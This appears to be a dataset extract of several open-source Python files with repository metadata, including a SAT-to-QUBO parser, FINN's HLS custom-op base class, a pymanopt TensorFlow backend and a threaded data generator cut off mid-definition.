raise ValueError('No duplicates in vars are allowed!')
if 0 in self:
raise ValueError('Variable with 0 index is not allowed!')
def append(self, *args, **kwargs):
super(Clause, self).append(*args, **kwargs)
self._check()
def _parse_clause(line):
"""Parse a string that represents a clause.
Args:
line: a string, e.g. 'X0+X1-X2>=-1'
Returns:
A list of non-zero ints representing variables in the clause
(e.g., [1, 2, -3])
"""
line = line.replace(' ', '')
match = re.match(_CONSTRAINT_RE, line)
if not match:
raise ValueError('The input line doesn\'t match the expected format')
raw, c = match.groups()
raw = re.findall(_VARIABLE_RE, raw)
vs = [int(x.replace('X', '')) for x in raw]
# to avoid 0 index (0->1, 1->2, -2->-3)
vs = [x + 1 if x >= 0 else x - 1 for x in vs]
if '-X0' in raw:
vs.remove(1)
vs.append(-1)
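    # A CNF clause translated to a pseudo-Boolean constraint reads
    # sum(positive vars) + sum(1 - negated vars) >= 1, so the stated right-hand
    # side must equal 1 minus the number of negated variables.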
if int(c) != 1 - len([x for x in vs if x < 0]):
        raise ValueError('Constraint RHS is inconsistent with a CNF clause')
return vs
def _parse_lines_iterator(lines):
"""Parses a Daimler proprietary format.
Args:
lines: iterator of lines
Returns:
clauses - a list of Clauses of CNF problem
num_vars - amount of variables in a CNF problem
"""
clauses = []
if next(lines).strip() != 'Minimize':
raise ValueError('Wrong file format')
if next(lines).strip() != '0':
raise ValueError('Wrong file format')
if next(lines).strip() != 'Subject To':
raise ValueError('Wrong file format')
while True:
line = next(lines).strip()
if line == 'Bounds':
break
p = _parse_clause(line)
clauses.append(Clause(p))
if next(lines).strip() != 'Binaries':
raise ValueError('Wrong file format')
num_vars = len(next(lines).strip().split())
max_ind = max(max(abs(ind) for ind in c) for c in clauses)
if not num_vars >= max_ind:
raise ValueError('Wrong file format')
if next(lines).strip() != 'End':
raise ValueError('Wrong file format')
return clauses, num_vars
def parse_file(file_name):
"""Parse a proprietary Daimler's format.
Args:
file_name: a full path to a file
Returns:
a SAT instance of a problem
"""
with open(file_name, 'r') as f:
c, n = _parse_lines_iterator(f)
return Sat(c, n, file_name)
def _parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dir',
help='Dir to process all files',
type=str)
parser.add_argument(
'--dwave',
        help='Also write each problem in D-Wave QUBO format',
default=False,
type=bool)
args = parser.parse_args()
return vars(args)
def _proccess_all(path, transform=False):
"""Proccess all files and converts problems to QUBO."""
files = [os.path.join(path, f) for f in os.listdir(path)
if f.endswith('.lp')]
problems = []
def _check_stat(file_stat, value, file_name):
if ((file_stat['eq'] == 'gt' and value > file_stat['value']) or
(file_stat['eq'] == 'lt' and value < file_stat['value'])):
file_stat['value'] = value
file_stat['filename'] = file_name
stats = {
'max_totat_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'max_initial_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'max_anc_bits': {'value': 0, 'filename': '', 'eq': 'gt'},
'min_total_bits': {'value': np.inf, 'filename': '', 'eq': 'lt'}}
for f in files:
sat = parse_file(f)
qubo = QuboProblem(sat)
initial_bits = sat.num_vars
total_bits = len(qubo.var_names)
if transform:
outputname = '{0}/dwave/{1}.qubo'.format(
os.path.dirname(os.path.realpath(f)),
os.path.basename(f).split('.')[0])
with open(outputname, 'w') as f1:
for line in qubo.to_qwave_format():
f1.write(line)
anc_bits = total_bits - initial_bits
_check_stat(stats['max_initial_bits'], initial_bits, f)
_check_stat(stats['max_totat_bits'], total_bits, f)
_check_stat(stats['min_total_bits'], total_bits, f)
_check_stat(stats['max_anc_bits'], anc_bits, f)
problems.append(sat)
for k, v in stats.items():
print('%s: %s in %s' % (k, v['value'], v['filename']))
print('Success!')
def main():
args = _parse_args()
if 'dir' in args:
_proccess_all(args['dir'], args['dwave'])
if __name__ == '__main__':
main()
| 31.315068 | 79 | 0.595071 |
a688898f4a43b33fd3f07cda12144b84829e451f
| 23,545 |
py
|
Python
|
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | 1 |
2021-01-29T14:39:48.000Z
|
2021-01-29T14:39:48.000Z
|
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | null | null | null |
src/finn/custom_op/fpgadataflow/__init__.py
|
vision-agh/finn_fork_pp_lidar
|
a40bd59d3f42a246b0d06329208b84bcc7be8a3e
|
[
"BSD-3-Clause"
] | 1 |
2022-03-07T02:57:55.000Z
|
2022-03-07T02:57:55.000Z
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from abc import abstractmethod
import numpy as np
import os
import subprocess
from finn.custom_op import CustomOp
from finn.util.basic import (
CppBuilder,
make_build_dir,
roundup_to_integer_multiple,
get_rtlsim_trace_depth,
)
from finn.util.fpgadataflow import (
IPGenBuilder,
pyverilate_get_liveness_threshold_cycles,
rtlsim_multi_io,
)
from . import templates
try:
from pyverilator import PyVerilator
except ModuleNotFoundError:
PyVerilator = None
class HLSCustomOp(CustomOp):
"""HLSCustomOp class all custom ops that correspond to a finn-hlslib
function are based on. Contains different functions every fpgadataflow
custom node should have. Some as abstract methods, these have to be filled
when writing a new fpgadataflow custom op node."""
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.code_gen_dict = {}
# getting templates from templates.py
# template for single node execution
self.docompute_template = templates.docompute_template
# templates for single node ip generation
# cpp file
self.ipgen_template = templates.ipgen_template
# tcl script
self.ipgentcl_template = templates.ipgentcl_template
def get_nodeattr_types(self):
return {
"backend": ("s", True, "fpgadataflow"),
"code_gen_dir_cppsim": ("s", False, ""),
"code_gen_dir_ipgen": ("s", False, ""),
"executable_path": ("s", False, ""),
"ipgen_path": ("s", False, ""),
"ip_path": ("s", False, ""),
"ip_vlnv": ("s", False, ""),
"exec_mode": ("s", False, ""),
"sim_cycles": ("i", False, 0),
"rtlsim_trace": ("s", False, ""),
"res_estimate": ("s", False, ""),
"res_hls": ("s", False, ""),
"res_synth": ("s", False, ""),
"rtlsim_so": ("s", False, ""),
# input and output FIFO depths
"inFIFODepth": ("i", False, 2),
"outFIFODepth": ("i", False, 2),
}
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s_%s" % (node.name, node.name)
return prefixed_top_name
def get_verilog_top_filename(self):
"Return the Verilog top module filename for this node."
verilog_file = "{}/project_{}/sol1/impl/verilog/{}.v".format(
self.get_nodeattr("code_gen_dir_ipgen"),
self.onnx_node.name,
self.get_verilog_top_module_name(),
)
return verilog_file
def get_all_verilog_paths(self):
"Return list of all folders containing Verilog code for this node."
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
assert (
code_gen_dir != ""
), """Node attribute "code_gen_dir_ipgen" is
not set. Please run HLSSynthIP first."""
verilog_path = "{}/project_{}/sol1/impl/verilog/".format(
code_gen_dir, self.onnx_node.name
)
# default impl only returns the HLS verilog codegen dir
return [verilog_path]
def get_all_verilog_filenames(self):
"Return list of all Verilog files used for this node."
verilog_files = []
verilog_paths = self.get_all_verilog_paths()
for verilog_path in verilog_paths:
for f in os.listdir(verilog_path):
if f.endswith(".v"):
verilog_files += [f]
return verilog_files
def prepare_rtlsim(self):
"""Creates a Verilator emulation library for the RTL code generated
for this node, sets the rtlsim_so attribute to its path and returns
a PyVerilator wrapper around it."""
if PyVerilator is None:
raise ImportError("Installation of PyVerilator is required.")
verilog_paths = self.get_all_verilog_paths()
verilog_files = self.get_all_verilog_filenames()
# build the Verilator emu library
sim = PyVerilator.build(
verilog_files,
build_dir=make_build_dir("pyverilator_" + self.onnx_node.name + "_"),
verilog_path=verilog_paths,
trace_depth=get_rtlsim_trace_depth(),
top_module_name=self.get_verilog_top_module_name(),
)
# save generated lib filename in attribute
self.set_nodeattr("rtlsim_so", sim.lib._name)
return sim
def get_rtlsim(self):
"""Return a PyVerilator wrapper for the Verilator emulation library
for this node."""
rtlsim_so = self.get_nodeattr("rtlsim_so")
assert os.path.isfile(rtlsim_so), "Cannot find rtlsim library."
# create PyVerilator wrapper
sim = PyVerilator(rtlsim_so)
return sim
def node_res_estimation(self):
"""Returns summarized resource estimation of BRAMs and LUTs
of the node as a dictionary."""
ret = dict()
ret["BRAM_18K"] = self.bram_estimation()
ret["LUT"] = self.lut_estimation()
return ret
def bram_estimation(self):
"""Function for BRAM resource estimation, is member function of
HLSCustomOp class but has to be filled by every node"""
return 0
def lut_estimation(self):
"""Function for LUT resource estimation, is member function of
HLSCustomOp class but has to be filled by every node"""
return 0
def code_generation_ipgen(self, model, fpgapart, clk):
"""Generates c++ code and tcl script for ip generation."""
node = self.onnx_node
# generate top cpp file for ip generation
path = self.get_nodeattr("code_gen_dir_ipgen")
self.code_gen_dict["$AP_INT_MAX_W$"] = [str(self.get_ap_int_max_w())]
self.generate_params(model, path)
self.global_includes()
self.defines("ipgen")
self.blackboxfunction()
self.pragmas()
self.docompute()
template = self.ipgen_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
f = open(os.path.join(code_gen_dir, "top_{}.cpp".format(node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
# generate tcl script for ip generation
self.code_gen_dict["$PROJECTNAME$"] = ["project_{}".format(node.name)]
self.code_gen_dict["$HWSRCDIR$"] = [code_gen_dir]
self.code_gen_dict["$FPGAPART$"] = [fpgapart]
self.code_gen_dict["$FINNHLSLIBDIR$"] = ["/workspace/finn-hlslib"]
self.code_gen_dict["$TOPFXN$"] = [node.name]
self.code_gen_dict["$CLKPERIOD$"] = [str(clk)]
self.code_gen_dict["$EXTRA_DIRECTIVES$"] = self.ipgen_extra_directives()
template = self.ipgentcl_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
f = open(os.path.join(code_gen_dir, "hls_syn_{}.tcl".format(node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_extra_directives(self):
"Return a list of extra tcl directives for HLS synthesis."
return []
def ipgen_singlenode_code(self):
"""Builds the bash script for ip generation using the IPGenBuilder from
finn.util.fpgadataflow."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
builder = IPGenBuilder()
builder.append_tcl(code_gen_dir + "/hls_syn_{}.tcl".format(node.name))
builder.set_ipgen_path(code_gen_dir + "/project_{}".format(node.name))
builder.build(code_gen_dir)
self.set_nodeattr("ipgen_path", builder.ipgen_path)
self.set_nodeattr("ip_path", builder.ipgen_path + "/sol1/impl/ip")
vlnv = "xilinx.com:hls:%s:1.0" % node.name
self.set_nodeattr("ip_vlnv", vlnv)
def code_generation_cppsim(self, model):
"""Generates c++ code for simulation (cppsim)."""
node = self.onnx_node
path = self.get_nodeattr("code_gen_dir_cppsim")
self.code_gen_dict["$AP_INT_MAX_W$"] = [str(self.get_ap_int_max_w())]
self.generate_params(model, path)
self.global_includes()
self.defines("cppsim")
self.read_npy_data()
self.strm_decl()
self.pragmas()
self.docompute()
self.dataoutstrm()
self.save_as_npy()
template = self.docompute_template
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
f = open(os.path.join(code_gen_dir, "execute_{}.cpp".format(node.op_type)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def compile_singlenode_code(self):
"""Builds the bash script for compilation using the CppBuilder from
finn.util.basic and executes the script to produce the executable."""
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
builder = CppBuilder()
        # to enable additional debug features please uncomment the next line
# builder.append_includes("-DDEBUG")
builder.append_includes("-I/workspace/finn/src/finn/data/cpp")
builder.append_includes("-I/workspace/cnpy/")
builder.append_includes("-I/workspace/finn-hlslib")
builder.append_includes("-I{}/include".format(os.environ["VIVADO_PATH"]))
builder.append_includes("--std=c++11")
builder.append_includes("-O3")
builder.append_sources(code_gen_dir + "/*.cpp")
builder.append_sources("/workspace/cnpy/cnpy.cpp")
builder.append_includes("-lz")
builder.set_executable_path(code_gen_dir + "/node_model")
builder.build(code_gen_dir)
self.set_nodeattr("executable_path", builder.executable_path)
def dynamic_input_to_npy(self, context, count):
"""Saves input (given context) into .npy files.
Count indicates the number of inputs that have to be saved."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
if code_gen_dir == "":
raise Exception(
"""
Found no codegen dir for this node, did you run the prepare_cppsim transformation?
"""
)
# create a npy file for each input of the node (in_ind is input index)
# assuming dynamic inputs start from 0
for in_ind in range(count):
current_input_name = node.input[in_ind]
# make copy before saving array
input_array = context[current_input_name].copy()
np.save(
os.path.join(code_gen_dir, "input_{}.npy".format(in_ind)), input_array
)
def npy_to_dynamic_output(self, context):
"""Reads the output from an output.npy file generated from cppsim and
places its content into the context dictionary."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
output = np.load("{}/output.npy".format(code_gen_dir))
context[node.output[0]] = output
def npy_to_dynamic_outputs(self, context, npy_list):
"""Reads the output from .npy files generated from cppsim and places
their content into the context dictionary.
npy_list is a list specifying which files to read, and its order must
match the order of node outputs."""
node = self.onnx_node
code_gen_dir = self.get_nodeattr("code_gen_dir_cppsim")
for i in range(len(npy_list)):
output = np.load("{}/{}".format(code_gen_dir, npy_list[i]))
context[node.output[i]] = output
def exec_precompiled_singlenode_model(self):
"""Executes precompiled executable."""
executable_path = self.get_nodeattr("executable_path")
if executable_path == "":
raise Exception(
"""
Found no executable for this node, did you run the codegen and
compilation transformations?
"""
)
process_execute = subprocess.Popen(executable_path, stdout=subprocess.PIPE)
process_execute.communicate()
def reset_rtlsim(self, sim):
"""Sets reset input in pyverilator to zero, toggles the clock and set it
back to one"""
sim.io.ap_rst_n = 0
sim.io.ap_clk = 1
sim.io.ap_clk = 0
sim.io.ap_rst_n = 1
def toggle_clk(self, sim):
"""Toggles the clock input in pyverilator once."""
sim.io.ap_clk = 1
sim.io.ap_clk = 0
def rtlsim(self, sim, inp, inp2=None):
"""Runs the pyverilator simulation by passing the input values to the simulation,
toggle the clock and observing the execution time. Function contains also an
observation loop that can abort the simulation if no output value is produced
after 100 cycles."""
trace_file = self.get_nodeattr("rtlsim_trace")
if trace_file != "":
if trace_file == "default":
trace_file = self.onnx_node.name + ".vcd"
sim.start_vcd_trace(trace_file)
inputs = inp
outputs = []
sim.io.out_V_V_TREADY = 1
# observe if output is completely calculated
# observation_count will contain the number of cycles the calculation ran
num_out_values = self.get_number_output_values()
output_observed = False
observation_count = 0
# avoid infinite looping of simulation by aborting when there is no change in
# output values after 100 cycles
no_change_count = 0
old_outputs = outputs
liveness_threshold = pyverilate_get_liveness_threshold_cycles()
while not (output_observed):
sim.io.in0_V_V_TVALID = 1 if len(inputs) > 0 else 0
sim.io.in0_V_V_TDATA = inputs[0] if len(inputs) > 0 else 0
if sim.io.in0_V_V_TREADY == 1 and sim.io.in0_V_V_TVALID == 1:
inputs = inputs[1:]
if inp2 is not None:
sim.io.in1_V_V_TVALID = 1 if len(inp2) > 0 else 0
sim.io.in1_V_V_TDATA = inp2[0] if len(inp2) > 0 else 0
if sim.io.in1_V_V_TREADY == 1 and sim.io.in1_V_V_TVALID == 1:
inp2 = inp2[1:]
if sim.io.out_V_V_TVALID == 1 and sim.io.out_V_V_TREADY == 1:
outputs = outputs + [sim.io.out_V_V_TDATA]
sim.io.ap_clk = 1
sim.io.ap_clk = 0
observation_count = observation_count + 1
no_change_count = no_change_count + 1
if len(outputs) == num_out_values:
self.set_nodeattr("sim_cycles", observation_count)
output_observed = True
if no_change_count == liveness_threshold:
if old_outputs == outputs:
if trace_file != "":
sim.flush_vcd_trace()
sim.stop_vcd_trace()
raise Exception(
"Error in simulation! Takes too long to produce output. "
"Consider setting the LIVENESS_THRESHOLD env.var. to a "
"larger value."
)
else:
no_change_count = 0
old_outputs = outputs
if trace_file != "":
sim.flush_vcd_trace()
sim.stop_vcd_trace()
return outputs
def rtlsim_multi_io(self, sim, io_dict):
"Run rtlsim for this node, supports multiple i/o streams."
trace_file = self.get_nodeattr("rtlsim_trace")
if trace_file == "default":
trace_file = self.onnx_node.name + ".vcd"
num_out_values = self.get_number_output_values()
total_cycle_count = rtlsim_multi_io(sim, io_dict, num_out_values, trace_file)
self.set_nodeattr("sim_cycles", total_cycle_count)
def execute_node(self, context, graph):
"""Executes single node using cppsim or rtlsim."""
mode = self.get_nodeattr("exec_mode")
if mode == "cppsim":
# save input(s)
self.dynamic_input_to_npy(context, 1)
# execute the precompiled model
self.exec_precompiled_singlenode_model()
# load output npy file
self.npy_to_dynamic_output(context)
elif mode == "rtlsim":
pass
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def generate_params(self, model, path):
"""Function to generate parameters (i.e. weights and thresholds),
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def get_number_output_values(self):
"""Function to get the number of expected output values,
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def global_includes(self):
"""Function to set the global includes for c++ code that has to be generated
for cppsim or rtlsim, is member function of HLSCustomOp class but has to
be filled by every node."""
pass
@abstractmethod
def defines(self, var):
"""Function to set the define commands for c++ code that has to be generated
for cppsim or rtlsim, is member function of HLSCustomOp class but has to
be filled by every node.
var: makes it possible to reuse the function for different c++ code generation.
I.e. if set to "ipgen" in StreamingFCLayer_Batch additional PRAGMA defines are
added."""
pass
@abstractmethod
def read_npy_data(self):
"""Function to generate the commands for reading data from .npy file in c++,
is member function of HLSCustomOp class but has to be filled by every node."""
pass
@abstractmethod
def strm_decl(self):
"""Function to generate the commands for the stream declaration in c++,
is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def docompute(self):
"""Function to generate the commands for the computational part of the
c++ code, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def dataoutstrm(self):
"""Function to generate the commands for reading out data from c++ and convert
into npy format, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def save_as_npy(self):
"""Function to generate the commands for saving data in .npy file in c++,
is member function of HLSCustomOp class but has to be filled by every node."""
pass
@abstractmethod
def blackboxfunction(self):
"""Function to generate a blackbock function in c++ from which an IP block
will be generated, is member function of HLSCustomOp class but has to be filled
by every node."""
pass
@abstractmethod
def pragmas(self):
"""Function to generate the pragma commands in c++, is member function of
HLSCustomOp class but has to be filled by every node."""
pass
def get_normal_input_shape(self):
"""Returns normal input shape if implemented."""
raise Exception("get_normal_input_shape not implemented for this op")
def get_normal_output_shape(self):
"""Returns folded output shape if implemented."""
raise Exception("get_normal_output_shape not implemented for this op")
def get_folded_input_shape(self):
"""Returns folded input shape (according to synapse folding), if implemented."""
raise Exception("get_folded_input_shape not implemented for this op")
def get_folded_output_shape(self):
"""Returns folded output shape (according to neuron folding), if implemented."""
raise Exception("get_folded_output_shape not implemented for this op")
def get_instream_width(self):
"""Returns input stream width, if implemented."""
raise Exception("get_instream_width not implemented for this op")
def get_outstream_width(self):
"""Returns output stream width, if implemented."""
raise Exception("get_outstream_width not implemented for this op")
def get_instream_width_padded(self):
"""Returns input stream width padded to a multiple of 8. This is required
by the AXI Stream spec."""
in_width = self.get_instream_width()
return roundup_to_integer_multiple(in_width, 8)
def get_outstream_width_padded(self):
"""Returns output stream width padded to a multiple of 8. This is required
by the AXI Stream spec."""
out_width = self.get_outstream_width()
return roundup_to_integer_multiple(out_width, 8)
def get_ap_int_max_w(self):
"Return the maximum width of any ap_int used in this module."
instream = self.get_instream_width()
outstream = self.get_outstream_width()
return max([instream, outstream])
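# Illustrative sketch (not part of FINN): the byte-alignment rule used by
# get_instream_width_padded/get_outstream_width_padded above. The real helper
# is roundup_to_integer_multiple from finn.util.basic; this stand-alone
# re-implementation only demonstrates the arithmetic.
#
#   def _roundup_to_multiple(value, factor):
#       # smallest multiple of `factor` that is >= `value`
#       return int(-(-value // factor) * factor)
#
#   _roundup_to_multiple(9, 8)   # -> 16 (a 9-bit stream is padded to 16 bits)
#   _roundup_to_multiple(32, 8)  # -> 32 (already aligned widths are unchanged)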
| 40.247863 | 89 | 0.640136 |
5c5cce6d9adaa4bcb55dbe5ec319111ae9b1ef18
| 2,940 |
py
|
Python
|
pymanopt/tools/autodiff/_tensorflow.py
|
Nehoroshiy/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | 1 |
2021-11-08T11:30:49.000Z
|
2021-11-08T11:30:49.000Z
|
pymanopt/tools/autodiff/_tensorflow.py
|
thatdeep/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | null | null | null |
pymanopt/tools/autodiff/_tensorflow.py
|
thatdeep/pymanopt
|
e0d45b6299c9e5fee21b2780954db6045afb878b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Module containing functions to differentiate functions using tensorflow.
"""
try:
import tensorflow as tf
from tensorflow.python.ops.gradients import _hessian_vector_product
except ImportError:
tf = None
from warnings import warn
from ._backend import Backend, assert_backend_available
class TensorflowBackend(Backend):
def __init__(self):
if tf is not None:
self._session = tf.Session()
def __str__(self):
return "tensorflow"
def is_available(self):
return tf is not None
@assert_backend_available
def is_compatible(self, objective, argument):
if isinstance(objective, tf.Tensor):
if (argument is None or not
isinstance(argument, tf.Variable) and not
all([isinstance(arg, tf.Variable)
for arg in argument])):
raise ValueError(
"Tensorflow backend requires an argument (or sequence of "
"arguments) with respect to which compilation is to be "
"carried out")
return True
return False
@assert_backend_available
def compile_function(self, objective, argument):
if not isinstance(argument, list):
def func(x):
feed_dict = {argument: x}
return self._session.run(objective, feed_dict)
else:
def func(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(objective, feed_dict)
return func
@assert_backend_available
def compute_gradient(self, objective, argument):
"""
Compute the gradient of 'objective' and return as a function.
"""
tfgrad = tf.gradients(objective, argument)
if not isinstance(argument, list):
def grad(x):
feed_dict = {argument: x}
return self._session.run(tfgrad[0], feed_dict)
else:
def grad(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(tfgrad, feed_dict)
return grad
@assert_backend_available
def compute_hessian(self, objective, argument):
if not isinstance(argument, list):
argA = tf.Variable(tf.zeros(tf.shape(argument)))
tfhess = _hessian_vector_product(objective, [argument], [argA])
def hess(x, a):
feed_dict = {argument: x, argA: a}
return self._session.run(tfhess[0], feed_dict)
else:
argA = [tf.Variable(tf.zeros(tf.shape(arg)))
for arg in argument]
tfhess = _hessian_vector_product(objective, argument, argA)
def hess(x, a):
feed_dict = {i: d for i, d in zip(argument+argA, x+a)}
return self._session.run(tfhess, feed_dict)
return hess
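# Minimal usage sketch (assumes graph-mode TensorFlow 1.x with tf.Session, as
# this backend targets, and that variables can be fed through feed_dict the
# same way compile_function does). The variable and cost names are
# illustrative only:
#
#   x = tf.Variable(tf.zeros([3], dtype=tf.float64))
#   cost = tf.reduce_sum(tf.square(x))
#   backend = TensorflowBackend()
#   cost_fn = backend.compile_function(cost, x)
#   grad_fn = backend.compute_gradient(cost, x)
#   cost_fn([1.0, 2.0, 3.0])   # expected -> 14.0
#   grad_fn([1.0, 2.0, 3.0])   # expected -> array([2., 4., 6.])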
| 30.625 | 78 | 0.584354 |
5581cd3dd132efe9cc3a64ad838cd98d5d601143
| 461 |
py
|
Python
|
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20 |
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/weapon/melee/polearm/shared_lance_lightsaber_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20 |
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Weapon()
result.template = "object/weapon/melee/polearm/shared_lance_lightsaber_01.iff"
result.attribute_template_id = 10
result.stfName("weapon_name","lance_lightsaber")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 27.117647 | 79 | 0.735358 |
5caaa49ed3c941c1fa8c44b84c358ec2f1b92d4b
| 882 |
py
|
Python
|
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
BuildSimHubAPI/measures/__init__.py
|
mostaphaRoudsari/buildsimhub_python_api
|
4a562a678fc2f9671f9fc62faae46b79c448a922
|
[
"MIT"
] | null | null | null |
# not needed to import this module - hide it from the public
# from BuildSimHubAPI.actions import ModelAction
from .window_uvalue import WindowUValue
from .window_shgc import WindowSHGC
from .window_wall_ratio import WindowWallRatio
from .wall_rvalue import WallRValue
from .roof_rvalue import RoofRValue
from .light_lpd import LightLPD
from .infiltration import Infiltration
from .occupancy_sensor import OccupancySensor
from .daylit_sensor import DaylightingSensor
from .cooling_all_cop import CoolingCOP
from .cooling_coil_cop import CoolingCoilCOP
from .cooling_chiller_cop import CoolingChillerCOP
from .heating_efficiency import HeatingEfficiency
from .window_wall_ratio_south import WindowWallRatioSouth
from .window_wall_ratio_west import WindowWallRatioWest
from .window_wall_ratio_east import WindowWallRatioEast
from .window_wall_ratio_north import WindowWallRatioNorth
| 42 | 60 | 0.877551 |
c6b4d06d651a50061aae3c78a2f4d1b256b0dbfc
| 2,313 |
py
|
Python
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 29 |
2019-07-22T01:57:42.000Z
|
2022-03-31T15:51:42.000Z
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 6 |
2020-02-13T06:11:55.000Z
|
2021-06-17T18:13:08.000Z
|
utils/data_generator.py
|
nodamu/Car-Ticketing-Project
|
a1e38d6d0c844b03b62b6ed07aabc18934cc83f5
|
[
"Linux-OpenIB"
] | 17 |
2019-09-19T09:56:16.000Z
|
2021-06-12T22:42:30.000Z
|
import numpy as np
from threading import Semaphore, Thread
from time import sleep
from random import choice, randint
from pdb import set_trace as pause
class DataGenerator(object):
def __init__( self, data, process_data_item_func, xshape, yshape, \
data_item_selector = choice, \
nthreads = 2, \
pool_size = 1000, \
min_nsamples = 1, \
dtype = 'single' ):
assert pool_size >= min_nsamples, \
'Min. samples must be equal or less than pool_size'
assert min_nsamples > 0 and pool_size > 0, \
'Min. samples and pool size must be positive non-zero numbers'
self._data = data
self._process_data_item = process_data_item_func
self._data_item_selector = data_item_selector
self._xshape = xshape
self._yshape = yshape
self._nthreads = nthreads
self._pool_size = pool_size
self._min_nsamples = min_nsamples
self._dtype = dtype
self._count = 0
self._stop = False
self._threads = []
self._sem = Semaphore()
self._X, self._Y = self._get_buffers(self._pool_size)
def _get_buffers(self,N):
X = np.empty((N,) + self._xshape, dtype=self._dtype)
Y = np.empty((N,) + self._yshape, dtype=self._dtype)
return X,Y
def _compute_sample(self):
d = self._data_item_selector(self._data)
return self._process_data_item(d)
def _insert_data(self,x,y):
